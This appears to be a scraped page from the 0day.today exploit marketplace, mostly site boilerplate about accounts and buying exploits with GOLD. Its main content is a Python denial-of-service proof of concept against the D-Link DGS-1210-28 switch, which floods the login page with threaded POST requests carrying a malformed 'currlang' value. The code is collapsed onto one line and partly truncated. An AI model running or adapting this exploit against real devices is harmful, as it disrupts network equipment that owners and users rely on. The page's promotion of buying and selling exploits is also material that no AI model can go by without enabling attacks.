0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
D-Link DGS-1210-28 Denial Of Service Exploit
# Exploit Title: D-Link DGS-1210-28 Denial of Service # Exploit Author: Saeed Reza Zamanian # Product : D-Link DGS-1210-28 # Vendor Homepage: https://www.dlink.com/ # Product Link: https://www.dlink.com/en/products/dgs-1210-28-28-port-gigabit-smart-managed-switch # Version : DGS-1210-28 # # Description : Device Login page is vulnerable against DoS attack. "currlang" parameter can accept # int values , # if an attacker sends several requests with string value in currlang parameter it # can affect device availability. # # Caution: Use this PoC at your own risk. import requests import json import sys import os from concurrent.futures import ThreadPoolExecutor, as_completed from time import time intro = "==============================\n D-Link DGS-1210-28 DoS Tool \n==============================\nUsage : python3 "+os.path.basename(__file__)+ " IPAddress \n\teg: python3 "+os.> if len(sys.argv) < 2: print(intro+"\n--------------\nFew Parameters\n") exit() def sendRequest(ip): url = 'https://'+ip+'/homepage.htm' postData = "Password=anyanyany&currlang=40anyanyany&Login=admin&BrowsingPage=index_dlink.htm&changlang=0" r = requests.post(url, data = postData, headers = "") def process(ip): processes = [] with ThreadPoolExecutor(max_workers=10) as executor: for x in range(100): processes.append(executor.submit(sendRequest,str(ip))) for task in as_completed(processes): if task.result(): print(task.result()) process(sys.argv[1]) #EOF # 0day.today [2024-11-14] #